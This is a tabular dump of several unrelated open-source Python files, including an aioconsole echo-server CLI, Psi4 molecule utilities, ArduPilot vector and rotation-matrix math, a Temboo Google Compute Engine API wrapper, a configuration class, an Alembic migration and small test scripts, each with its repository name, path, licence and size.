| text (stringlengths 6–947k) | repo_name (stringlengths 5–100) | path (stringlengths 4–231) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int64, 6–947k) | score (float64, 0–0.34) |
---|---|---|---|---|---|---|
"""Command line interface for echo server."""
import fnmatch
import asyncio
import argparse
from aioconsole import AsynchronousCli, start_interactive_server
from aioconsole.server import parse_server, print_server
from . import echo
async def get_history(reader, writer, pattern=None):
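    # The companion echo server (see the echo module) records received
    # messages on the running event loop as `loop.history`, a mapping of
    # client host -> list of messages.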
history = asyncio.get_event_loop().history
if not history:
return "No message in the history"
if pattern:
history = {host: history[host] for host in fnmatch.filter(history, pattern)}
if not history:
return "No host match the given pattern"
for host in history:
writer.write(f"Host {host}:\n".encode())
for i, message in enumerate(history[host]):
writer.write(f" {i}. {message}\n".encode())
def make_cli(streams=None):
parser = argparse.ArgumentParser(description="Display the message history")
parser.add_argument("--pattern", "-p", type=str, help="pattern to filter hostnames")
commands = {"history": (get_history, parser)}
return AsynchronousCli(commands, streams, prog="echo")
def parse_args(args=None):
parser = argparse.ArgumentParser(
description="Run the echo server and a command line interface."
)
parser.add_argument(
"server",
metavar="[HOST:]PORT",
type=str,
help="interface for the echo server, default host is localhost",
)
parser.add_argument(
"--serve-cli",
metavar="[HOST:]PORT",
type=str,
help="serve the command line interface on the given host+port "
"instead of using the standard streams",
)
namespace = parser.parse_args(args)
host, port = parse_server(namespace.server, parser)
if namespace.serve_cli is not None:
serve_cli = parse_server(namespace.serve_cli, parser)
else:
serve_cli = None
return host, port, serve_cli
def main(args=None):
host, port, serve_cli = parse_args(args)
if serve_cli:
cli_host, cli_port = serve_cli
coro = start_interactive_server(make_cli, cli_host, cli_port)
server = asyncio.get_event_loop().run_until_complete(coro)
print_server(server, "command line interface")
else:
asyncio.ensure_future(make_cli().interact())
return echo.run(host, port)
if __name__ == "__main__":
main()
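# Example invocation (port numbers are illustrative):
#   python -m example.cli 8888 --serve-cli 8889
# starts the echo server on port 8888 and serves the "echo" CLI, with its
# `history` command, over TCP on port 8889 instead of the standard streams.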
| vxgmichel/aioconsole | example/cli.py | Python | gpl-3.0 | 2,320 | 0.000862 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2022 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Module with utility functions that act on molecule objects."""
from typing import Dict, Tuple, Union
import numpy as np
import qcelemental as qcel
from psi4 import core
from psi4.driver.p4util import temp_circular_import_blocker
from psi4.driver import qcdb
from psi4.driver.p4util.exceptions import *
def molecule_set_attr(self, name, value):
"""Function to redefine __setattr__ method of molecule class."""
fxn = object.__getattribute__(self, "is_variable")
isvar = fxn(name)
if isvar:
fxn = object.__getattribute__(self, "set_variable")
fxn(name, value)
return
object.__setattr__(self, name, value)
def molecule_get_attr(self, name):
"""Function to redefine __getattr__ method of molecule class."""
fxn = object.__getattribute__(self, "is_variable")
isvar = fxn(name)
if isvar:
fxn = object.__getattribute__(self, "get_variable")
return fxn(name)
return object.__getattribute__(self, name)
@classmethod
def _molecule_from_string(cls,
molstr,
dtype=None,
name=None,
fix_com=None,
fix_orientation=None,
fix_symmetry=None,
return_dict=False,
enable_qm=True,
enable_efp=True,
missing_enabled_return_qm='none',
missing_enabled_return_efp='none',
verbose=1):
molrec = qcel.molparse.from_string(
molstr=molstr,
dtype=dtype,
name=name,
fix_com=fix_com,
fix_orientation=fix_orientation,
fix_symmetry=fix_symmetry,
return_processed=False,
enable_qm=enable_qm,
enable_efp=enable_efp,
missing_enabled_return_qm=missing_enabled_return_qm,
missing_enabled_return_efp=missing_enabled_return_efp,
verbose=verbose)
if return_dict:
return core.Molecule.from_dict(molrec['qm']), molrec
else:
return core.Molecule.from_dict(molrec['qm'])
@classmethod
def _molecule_from_arrays(cls,
geom=None,
elea=None,
elez=None,
elem=None,
mass=None,
real=None,
elbl=None,
name=None,
units='Angstrom',
input_units_to_au=None,
fix_com=None,
fix_orientation=None,
fix_symmetry=None,
fragment_separators=None,
fragment_charges=None,
fragment_multiplicities=None,
molecular_charge=None,
molecular_multiplicity=None,
comment=None,
provenance=None,
connectivity=None,
missing_enabled_return='error',
tooclose=0.1,
zero_ghost_fragments=False,
nonphysical=False,
mtol=1.e-3,
verbose=1,
return_dict=False):
"""Construct Molecule from unvalidated arrays and variables.
Light wrapper around :py:func:`~qcelemental.molparse.from_arrays`
    that is a full-featured constructor to the dictionary representation
    of Molecule. This function goes one step further and returns a
    Molecule instance.
Parameters
----------
See :py:func:`~qcelemental.molparse.from_arrays`.
Returns
-------
:py:class:`psi4.core.Molecule`
"""
molrec = qcel.molparse.from_arrays(
geom=geom,
elea=elea,
elez=elez,
elem=elem,
mass=mass,
real=real,
elbl=elbl,
name=name,
units=units,
input_units_to_au=input_units_to_au,
fix_com=fix_com,
fix_orientation=fix_orientation,
fix_symmetry=fix_symmetry,
fragment_separators=fragment_separators,
fragment_charges=fragment_charges,
fragment_multiplicities=fragment_multiplicities,
molecular_charge=molecular_charge,
molecular_multiplicity=molecular_multiplicity,
comment=comment,
provenance=provenance,
connectivity=connectivity,
domain='qm',
missing_enabled_return=missing_enabled_return,
tooclose=tooclose,
zero_ghost_fragments=zero_ghost_fragments,
nonphysical=nonphysical,
mtol=mtol,
verbose=verbose)
if return_dict:
return core.Molecule.from_dict(molrec), molrec
else:
return core.Molecule.from_dict(molrec)
@classmethod
def _molecule_from_schema(cls, molschema: Dict, return_dict: bool = False, nonphysical: bool = False, verbose: int = 1) -> Union[core.Molecule, Tuple[core.Molecule, Dict]]:
"""Construct Molecule from non-Psi4 schema.
Light wrapper around :py:func:`~psi4.core.Molecule.from_arrays`.
Parameters
----------
molschema
Dictionary form of Molecule following known schema.
return_dict
Additionally return Molecule dictionary intermediate.
nonphysical
        Whether to allow masses outside an element's natural range to pass validation.
verbose
Amount of printing.
Returns
-------
mol : :py:class:`psi4.core.Molecule`
molrec : dict
Dictionary representation of instance.
Only provided if `return_dict` is True.
"""
molrec = qcel.molparse.from_schema(molschema, nonphysical=nonphysical, verbose=verbose)
qmol = core.Molecule.from_dict(molrec)
geom = np.array(molrec["geom"]).reshape((-1, 3))
qmol._initial_cartesian = core.Matrix.from_array(geom)
if return_dict:
return qmol, molrec
else:
return qmol
def dynamic_variable_bind(cls):
"""Function to dynamically add extra members to
the core.Molecule class.
"""
cls.__setattr__ = molecule_set_attr
cls.__getattr__ = molecule_get_attr
cls.to_arrays = qcdb.Molecule.to_arrays
cls.to_dict = qcdb.Molecule.to_dict
cls.BFS = qcdb.Molecule.BFS
cls.B787 = qcdb.Molecule.B787
cls.scramble = qcdb.Molecule.scramble
cls.from_arrays = _molecule_from_arrays
cls.from_string = _molecule_from_string
cls.to_string = qcdb.Molecule.to_string
cls.from_schema = _molecule_from_schema
cls.to_schema = qcdb.Molecule.to_schema
cls.run_dftd3 = qcdb.Molecule.run_dftd3
cls.run_dftd4 = qcdb.Molecule.run_dftd4
cls.run_gcp = qcdb.Molecule.run_gcp
cls.format_molecule_for_mol = qcdb.Molecule.format_molecule_for_mol
dynamic_variable_bind(core.Molecule) # pass class type, not class instance
#
# Define geometry to be used by PSI4.
# The molecule created by this will be set in options.
#
# geometry("
# O 1.0 0.0 0.0
# H 0.0 1.0 0.0
# H 0.0 0.0 0.0
#
def geometry(geom, name="default"):
"""Function to create a molecule object of name *name* from the
geometry in string *geom*. Permitted for user use but deprecated
in driver in favor of explicit molecule-passing. Comments within
the string are filtered.
"""
molrec = qcel.molparse.from_string(
geom, enable_qm=True, missing_enabled_return_qm='minimal', enable_efp=True, missing_enabled_return_efp='none')
molecule = core.Molecule.from_dict(molrec['qm'])
if "geom" in molrec["qm"]:
geom = np.array(molrec["qm"]["geom"]).reshape((-1, 3))
if molrec["qm"]["units"] == "Angstrom":
geom = geom / qcel.constants.bohr2angstroms
molecule._initial_cartesian = core.Matrix.from_array(geom)
molecule.set_name(name)
if 'efp' in molrec:
try:
import pylibefp
except ImportError as e: # py36 ModuleNotFoundError
raise ImportError("""Install pylibefp to use EFP functionality. `conda install pylibefp -c psi4` Or build with `-DENABLE_libefp=ON`""") from e
#print('Using pylibefp: {} (version {})'.format(pylibefp.__file__, pylibefp.__version__))
efpobj = pylibefp.from_dict(molrec['efp'])
# pylibefp.core.efp rides along on molecule
molecule.EFP = efpobj
# Attempt to go ahead and construct the molecule
try:
molecule.update_geometry()
except Exception:
core.print_out("Molecule: geometry: Molecule is not complete, please use 'update_geometry'\n"
" once all variables are set.\n")
activate(molecule)
return molecule
def activate(mol):
"""Function to set molecule object *mol* as the current active molecule.
Permitted for user use but deprecated in driver in favor of explicit
molecule-passing.
"""
core.set_active_molecule(mol)
| psi4/psi4 | psi4/driver/molutil.py | Python | lgpl-3.0 | 9,885 | 0.004856 |
#!/usr/bin/env python
#
# vector3 and rotation matrix classes
# This follows the conventions in the ArduPilot code,
# and is essentially a python version of the AP_Math library
#
# Andrew Tridgell, March 2012
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
'''rotation matrix class
'''
from math import sin, cos, sqrt, asin, atan2, pi, radians, acos, degrees
class Vector3:
'''a vector'''
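    # Operator conventions used below (dot product via *, cross product via %):
    #   Vector3(1, 0, 0) * Vector3(0, 1, 0)  ->  0.0
    #   Vector3(1, 0, 0) % Vector3(0, 1, 0)  ->  Vector3(0.00, 0.00, 1.00)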
def __init__(self, x=None, y=None, z=None):
        if x is not None and y is not None and z is not None:
self.x = float(x)
self.y = float(y)
self.z = float(z)
        elif x is not None and len(x) == 3:
self.x = float(x[0])
self.y = float(x[1])
self.z = float(x[2])
        elif x is not None:
raise ValueError('bad initialiser')
else:
self.x = float(0)
self.y = float(0)
self.z = float(0)
def __repr__(self):
return 'Vector3(%.2f, %.2f, %.2f)' % (self.x,
self.y,
self.z)
def __add__(self, v):
return Vector3(self.x + v.x,
self.y + v.y,
self.z + v.z)
__radd__ = __add__
def __sub__(self, v):
return Vector3(self.x - v.x,
self.y - v.y,
self.z - v.z)
def __neg__(self):
return Vector3(-self.x, -self.y, -self.z)
def __rsub__(self, v):
return Vector3(v.x - self.x,
v.y - self.y,
v.z - self.z)
def __mul__(self, v):
if isinstance(v, Vector3):
'''dot product'''
return self.x*v.x + self.y*v.y + self.z*v.z
return Vector3(self.x * v,
self.y * v,
self.z * v)
__rmul__ = __mul__
    def __div__(self, v):
        return Vector3(self.x / v,
                       self.y / v,
                       self.z / v)
    __truediv__ = __div__  # Python 3 maps the / operator to __truediv__
def __mod__(self, v):
'''cross product'''
return Vector3(self.y*v.z - self.z*v.y,
self.z*v.x - self.x*v.z,
self.x*v.y - self.y*v.x)
def __copy__(self):
return Vector3(self.x, self.y, self.z)
copy = __copy__
def length(self):
return sqrt(self.x**2 + self.y**2 + self.z**2)
def zero(self):
self.x = self.y = self.z = 0
def angle(self, v):
'''return the angle between this vector and another vector'''
return acos((self * v) / (self.length() * v.length()))
def normalized(self):
return self.__div__(self.length())
def normalize(self):
v = self.normalized()
self.x = v.x
self.y = v.y
self.z = v.z
class Matrix3:
'''a 3x3 matrix, intended as a rotation matrix'''
def __init__(self, a=None, b=None, c=None):
if a is not None and b is not None and c is not None:
self.a = a.copy()
self.b = b.copy()
self.c = c.copy()
else:
self.identity()
def __repr__(self):
return 'Matrix3((%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f))' % (
self.a.x, self.a.y, self.a.z,
self.b.x, self.b.y, self.b.z,
self.c.x, self.c.y, self.c.z)
def identity(self):
self.a = Vector3(1,0,0)
self.b = Vector3(0,1,0)
self.c = Vector3(0,0,1)
def transposed(self):
return Matrix3(Vector3(self.a.x, self.b.x, self.c.x),
Vector3(self.a.y, self.b.y, self.c.y),
Vector3(self.a.z, self.b.z, self.c.z))
def from_euler(self, roll, pitch, yaw):
'''fill the matrix from Euler angles in radians'''
cp = cos(pitch)
sp = sin(pitch)
sr = sin(roll)
cr = cos(roll)
sy = sin(yaw)
cy = cos(yaw)
self.a.x = cp * cy
self.a.y = (sr * sp * cy) - (cr * sy)
self.a.z = (cr * sp * cy) + (sr * sy)
self.b.x = cp * sy
self.b.y = (sr * sp * sy) + (cr * cy)
self.b.z = (cr * sp * sy) - (sr * cy)
self.c.x = -sp
self.c.y = sr * cp
self.c.z = cr * cp
def to_euler(self):
'''find Euler angles for the matrix'''
        if self.c.x >= 1.0:
            # c.x stores -sin(pitch), so the saturated values are -/+ pi/2
            pitch = -pi/2
        elif self.c.x <= -1.0:
            pitch = pi/2
else:
pitch = -asin(self.c.x)
roll = atan2(self.c.y, self.c.z)
yaw = atan2(self.b.x, self.a.x)
return (roll, pitch, yaw)
def __add__(self, m):
return Matrix3(self.a + m.a, self.b + m.b, self.c + m.c)
__radd__ = __add__
def __sub__(self, m):
return Matrix3(self.a - m.a, self.b - m.b, self.c - m.c)
def __rsub__(self, m):
return Matrix3(m.a - self.a, m.b - self.b, m.c - self.c)
def __mul__(self, other):
if isinstance(other, Vector3):
v = other
return Vector3(self.a.x * v.x + self.a.y * v.y + self.a.z * v.z,
self.b.x * v.x + self.b.y * v.y + self.b.z * v.z,
self.c.x * v.x + self.c.y * v.y + self.c.z * v.z)
elif isinstance(other, Matrix3):
m = other
return Matrix3(Vector3(self.a.x * m.a.x + self.a.y * m.b.x + self.a.z * m.c.x,
self.a.x * m.a.y + self.a.y * m.b.y + self.a.z * m.c.y,
self.a.x * m.a.z + self.a.y * m.b.z + self.a.z * m.c.z),
Vector3(self.b.x * m.a.x + self.b.y * m.b.x + self.b.z * m.c.x,
self.b.x * m.a.y + self.b.y * m.b.y + self.b.z * m.c.y,
self.b.x * m.a.z + self.b.y * m.b.z + self.b.z * m.c.z),
Vector3(self.c.x * m.a.x + self.c.y * m.b.x + self.c.z * m.c.x,
self.c.x * m.a.y + self.c.y * m.b.y + self.c.z * m.c.y,
self.c.x * m.a.z + self.c.y * m.b.z + self.c.z * m.c.z))
v = other
return Matrix3(self.a * v, self.b * v, self.c * v)
    def __div__(self, v):
        return Matrix3(self.a / v, self.b / v, self.c / v)
    __truediv__ = __div__  # Python 3 maps the / operator to __truediv__
def __neg__(self):
return Matrix3(-self.a, -self.b, -self.c)
def __copy__(self):
return Matrix3(self.a, self.b, self.c)
copy = __copy__
def rotate(self, g):
'''rotate the matrix by a given amount on 3 axes'''
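        # Small-angle update: each row of temp_matrix is row x g, i.e.
        # temp_matrix = R * skew(g), so this computes R <- R * (I + skew(g))
        # for a small rotation vector g (radians about the body x/y/z axes).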
temp_matrix = Matrix3()
a = self.a
b = self.b
c = self.c
temp_matrix.a.x = a.y * g.z - a.z * g.y
temp_matrix.a.y = a.z * g.x - a.x * g.z
temp_matrix.a.z = a.x * g.y - a.y * g.x
temp_matrix.b.x = b.y * g.z - b.z * g.y
temp_matrix.b.y = b.z * g.x - b.x * g.z
temp_matrix.b.z = b.x * g.y - b.y * g.x
temp_matrix.c.x = c.y * g.z - c.z * g.y
temp_matrix.c.y = c.z * g.x - c.x * g.z
temp_matrix.c.z = c.x * g.y - c.y * g.x
self.a += temp_matrix.a
self.b += temp_matrix.b
self.c += temp_matrix.c
def normalize(self):
'''re-normalise a rotation matrix'''
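        # Standard DCM renormalisation: `error` is the dot product of rows a
        # and b (zero when orthogonal); half of it is removed from each row,
        # c is rebuilt as t0 x t1, and every row is rescaled to unit length.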
error = self.a * self.b
t0 = self.a - (self.b * (0.5 * error))
t1 = self.b - (self.a * (0.5 * error))
t2 = t0 % t1
self.a = t0 * (1.0 / t0.length())
self.b = t1 * (1.0 / t1.length())
self.c = t2 * (1.0 / t2.length())
def trace(self):
'''the trace of the matrix'''
return self.a.x + self.b.y + self.c.z
def from_axis_angle(self, axis, angle):
'''create a rotation matrix from axis and angle'''
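        # Rodrigues' rotation formula, assuming `axis` is a unit vector u:
        #   R = cos(t)*I + (1 - cos(t))*u*u^T + sin(t)*skew(u)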
ux = axis.x
uy = axis.y
uz = axis.z
ct = cos(angle)
st = sin(angle)
self.a.x = ct + (1-ct) * ux**2
self.a.y = ux*uy*(1-ct) - uz*st
self.a.z = ux*uz*(1-ct) + uy*st
self.b.x = uy*ux*(1-ct) + uz*st
self.b.y = ct + (1-ct) * uy**2
self.b.z = uy*uz*(1-ct) - ux*st
self.c.x = uz*ux*(1-ct) - uy*st
self.c.y = uz*uy*(1-ct) + ux*st
self.c.z = ct + (1-ct) * uz**2
def from_two_vectors(self, vec1, vec2):
'''get a rotation matrix from two vectors.
This returns a rotation matrix which when applied to vec1
will produce a vector pointing in the same direction as vec2'''
angle = vec1.angle(vec2)
cross = vec1 % vec2
if cross.length() == 0:
# the two vectors are colinear
return self.from_euler(0,0,angle)
cross.normalize()
return self.from_axis_angle(cross, angle)
class Plane:
'''a plane in 3 space, defined by a point and a vector normal'''
def __init__(self, point=None, normal=None):
if point is None:
point = Vector3(0,0,0)
if normal is None:
normal = Vector3(0, 0, 1)
self.point = point
self.normal = normal
class Line:
'''a line in 3 space, defined by a point and a vector'''
def __init__(self, point=None, vector=None):
if point is None:
point = Vector3(0,0,0)
if vector is None:
vector = Vector3(0, 0, 1)
self.point = point
self.vector = vector
def plane_intersection(self, plane, forward_only=False):
'''return point where line intersects with a plane'''
l_dot_n = self.vector * plane.normal
if l_dot_n == 0.0:
# line is parallel to the plane
return None
d = ((plane.point - self.point) * plane.normal) / l_dot_n
if forward_only and d < 0:
return None
return (self.vector * d) + self.point
def test_euler():
'''check that from_euler() and to_euler() are consistent'''
m = Matrix3()
from math import radians, degrees
for r in range(-179, 179, 3):
for p in range(-89, 89, 3):
for y in range(-179, 179, 3):
m.from_euler(radians(r), radians(p), radians(y))
(r2, p2, y2) = m.to_euler()
v1 = Vector3(r,p,y)
v2 = Vector3(degrees(r2),degrees(p2),degrees(y2))
diff = v1 - v2
if diff.length() > 1.0e-12:
print('EULER ERROR:', v1, v2, diff.length())
def test_two_vectors():
'''test the from_two_vectors() method'''
import random
for i in range(1000):
v1 = Vector3(1, 0.2, -3)
v2 = Vector3(random.uniform(-5,5), random.uniform(-5,5), random.uniform(-5,5))
m = Matrix3()
m.from_two_vectors(v1, v2)
v3 = m * v1
diff = v3.normalized() - v2.normalized()
(r, p, y) = m.to_euler()
if diff.length() > 0.001:
print('err=%f' % diff.length())
print("r/p/y = %.1f %.1f %.1f" % (
degrees(r), degrees(p), degrees(y)))
print(v1.normalized(), v2.normalized(), v3.normalized())
def test_plane():
'''testing line/plane intersection'''
print("testing plane/line maths")
plane = Plane(Vector3(0,0,0), Vector3(0,0,1))
line = Line(Vector3(0,0,100), Vector3(10, 10, -90))
p = line.plane_intersection(plane)
print(p)
if __name__ == "__main__":
import doctest
doctest.testmod()
test_euler()
test_two_vectors()
| owenson/ardupilot-sdk-python | pymavlink/rotmat.py | Python | lgpl-3.0 | 12,026 | 0.004906 |
# -*- coding: utf-8 -*-
###############################################################################
#
# GetInstance
# Retrieves information about the specified Instance.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetInstance(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetInstance Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(GetInstance, self).__init__(temboo_session, '/Library/Google/ComputeEngine/Instances/GetInstance')
def new_input_set(self):
return GetInstanceInputSet()
def _make_result_set(self, result, path):
return GetInstanceResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetInstanceChoreographyExecution(session, exec_id, path)
class GetInstanceInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetInstance
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.)
"""
super(GetInstanceInputSet, self)._set_input('AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Google. Required unless providing a valid AccessToken.)
"""
super(GetInstanceInputSet, self)._set_input('ClientID', value)
def set_ClientSecret(self, value):
"""
Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Google. Required unless providing a valid AccessToken.)
"""
super(GetInstanceInputSet, self)._set_input('ClientSecret', value)
def set_Fields(self, value):
"""
Set the value of the Fields input for this Choreo. ((optional, string) Comma-seperated list of fields you want to include in the response.)
"""
super(GetInstanceInputSet, self)._set_input('Fields', value)
def set_Instance(self, value):
"""
Set the value of the Instance input for this Choreo. ((required, string) The name of the instance to retrieve.)
"""
super(GetInstanceInputSet, self)._set_input('Instance', value)
def set_Project(self, value):
"""
Set the value of the Project input for this Choreo. ((required, string) The ID of a Google Compute project.)
"""
super(GetInstanceInputSet, self)._set_input('Project', value)
def set_RefreshToken(self, value):
"""
Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.)
"""
super(GetInstanceInputSet, self)._set_input('RefreshToken', value)
def set_Zone(self, value):
"""
Set the value of the Zone input for this Choreo. ((required, string) The name of the zone associated with this request.)
"""
super(GetInstanceInputSet, self)._set_input('Zone', value)
class GetInstanceResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetInstance Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Google.)
"""
return self._output.get('Response', None)
def get_NewAccessToken(self):
"""
Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.)
"""
return self._output.get('NewAccessToken', None)
class GetInstanceChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetInstanceResultSet(response, path)
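# A minimal usage sketch; the session credentials and input values below are
# placeholders, and execute_with_results() is the Temboo SDK's synchronous
# execution call:
#
#   from temboo.core.session import TembooSession
#
#   session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = GetInstance(session)
#   inputs = choreo.new_input_set()
#   inputs.set_Project('my-project')
#   inputs.set_Zone('us-central1-a')
#   inputs.set_Instance('my-instance')
#   inputs.set_AccessToken('...')
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())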
| jordanemedlock/psychtruths | temboo/core/Library/Google/ComputeEngine/Instances/GetInstance.py | Python | apache-2.0 | 5,317 | 0.005266 |
# -*- coding: utf-8 -*-
# crunchyfrog - a database schema browser and query tool
# Copyright (C) 2008 Andi Albrecht <albrecht.andi@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Configuration"""
import gobject
from os.path import abspath, dirname, join
from configobj import ConfigObj
from gettext import gettext as _
import logging
log = logging.getLogger("CONFIG")
class Config(gobject.GObject):
"""Configuration object
An instance of this class is accessible through the ``config``
attribute of an `CFApplication`_ instance.
The Config class is a simplified wrapper around a ConfigObj
instance. It merges a default configuration located as package
data in this package with an user configuration.
The ``-c`` command line switch determines which user configuration
file is used. If it's not set, it defaults to
``~/.config/crunchyfrog/config``.
This wrapper provides only a getter and a setter for configuration
values and expects that option names are dotted strings (but only by
convention).
Values can be any basic Python types since it uses ConfigObj's
``unrepr`` mode (Read the `ConfigObj documentation`_ for details).
Plugins can connect to the `changed` signal to track configuration
changes, i.e. the SQL editor uses this signal to reflect changes
made through the preference dialog.
.. Note:: The runtime Config instance (``app.config``) is bound
to the application. So it is not possible to store instance
specific data here.
:Usage example:
.. sourcecode:: python
>>> app.config.get("foo.bar") # Not set yet, None is default
None
>>> app.config.set("foo.bar", True)
>>> app.config.get("foo.bar")
True
>>> app.config.set("foo.bar", ["Completely", "different"]) # No type check!
>>> print " ".join(app.config.get("foo.bar"))
Completely different
:Signals:
changed
            ``def callback(config, key, value, user_param1, ...)``
            Emitted when an option has changed.
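
    :Signal example:
        A minimal sketch; ``connect`` is the standard GObject signal API
        that this class inherits from ``gobject.GObject``:

        .. sourcecode:: python

            >>> def on_changed(config, key, value):
            ...     print "%s is now %r" % (key, value)
            >>> app.config.connect("changed", on_changed)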
.. _CFApplication: cf.app.CFApplication.html
.. _ConfigObj documentation: http://www.voidspace.org.uk/python/configobj.html#unrepr-mode
"""
__gsignals__ = {
"changed" : (gobject.SIGNAL_RUN_LAST,
gobject.TYPE_NONE,
(str, gobject.TYPE_PYOBJECT)),
}
def __init__(self, app, config_file):
"""
The constructor of this class takes two arguments:
:Parameter:
app
`CFApplication`_ instance
config_file
Path to user configuration file
.. _CFApplication: cf.app.CFApplication.html
"""
self.app = app
self.__gobject_init__() # IGNORE:E1101
self.__conf = None
self.__config_file = config_file
self.__init_conf()
self.app.register_shutdown_task(self.on_app_shutdown,
_(u"Writing configuration"))
def on_app_shutdown(self, *args): # IGNORE:W0613
"""Callback: write configuration file to disk"""
self.write()
def __init_conf(self):
"""Intialize the configuration system"""
self.__conf = ConfigObj(abspath(join(dirname(__file__), "default.cfg")),
unrepr=True)
log.info("Loading configuration file %r" % self.__config_file)
self.__conf.update(ConfigObj(self.__config_file, unrepr=True))
def init(self):
"""Loads configuration"""
pass
def get(self, key, default=None):
"""Returns value or default for key"""
return self.__conf.get(key, default)
def set(self, key, value):
"""Sets key to value"""
self.__conf[key] = value
self.emit("changed", key, value) # IGNORE:E1101
def write(self, fname=None):
"""Writes configuration file"""
if not fname:
fname = self.__config_file
fp = open(fname, "w")
self.__conf.write(fp)
fp.close()
| angvp/angelvelasquez-crunchyfrog | cf/config/__init__.py | Python | gpl-3.0 | 4,652 | 0.001505 |
#!/usr/bin/env python
from __future__ import print_function
import sys
import numpy
import pni.io.nx.h5 as nexus
f = nexus.create_file("test_string2.nxs", True)
d = f.root().create_group("scan_1","NXentry").\
create_group("detector","NXdetector")
sa = d.create_field("ListofStrings", "string", shape=(3, 2))
sa[0,0]="safdfdsffdsfd"
sa[1,0]="safdsfsfdsffdsfd"
sa[2,0]="safdfsfd"
print(sa[0,0])
print(sa[1,0])
print(sa[2,0])
print(sa[...])
f.close()
| pni-libraries/python-pni | doc/examples/old_examples/test_string2.py | Python | gpl-2.0 | 494 | 0.036437 |
"""Drafts as required folder
Revision ID: 41a7e825d108
Revises: 269247bc37d3
Create Date: 2014-03-13 21:14:25.652333
"""
# revision identifiers, used by Alembic.
revision = '41a7e825d108'
down_revision = '269247bc37d3'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('imapaccount', sa.Column('drafts_folder_name', sa.String(255), nullable=True))
def downgrade():
op.drop_column('imapaccount', 'drafts_folder_name')
| nylas/sync-engine | migrations/versions/004_drafts_as_required_folder.py | Python | agpl-3.0 | 459 | 0.006536 |
#!/usr/bin/python
#
# Copyright 2008-2010 WebDriver committers
# Copyright 2008-2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from selenium import webdriver
from selenium.test.selenium.webdriver.common import api_examples
from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer
def setup_module(module):
webserver = SimpleWebServer()
webserver.start()
FirefoxApiExampleTest.webserver = webserver
FirefoxApiExampleTest.driver = webdriver.Firefox()
class FirefoxApiExampleTest(api_examples.ApiExampleTest):
pass
def teardown_module(module):
FirefoxApiExampleTest.driver.quit()
FirefoxApiExampleTest.webserver.stop()
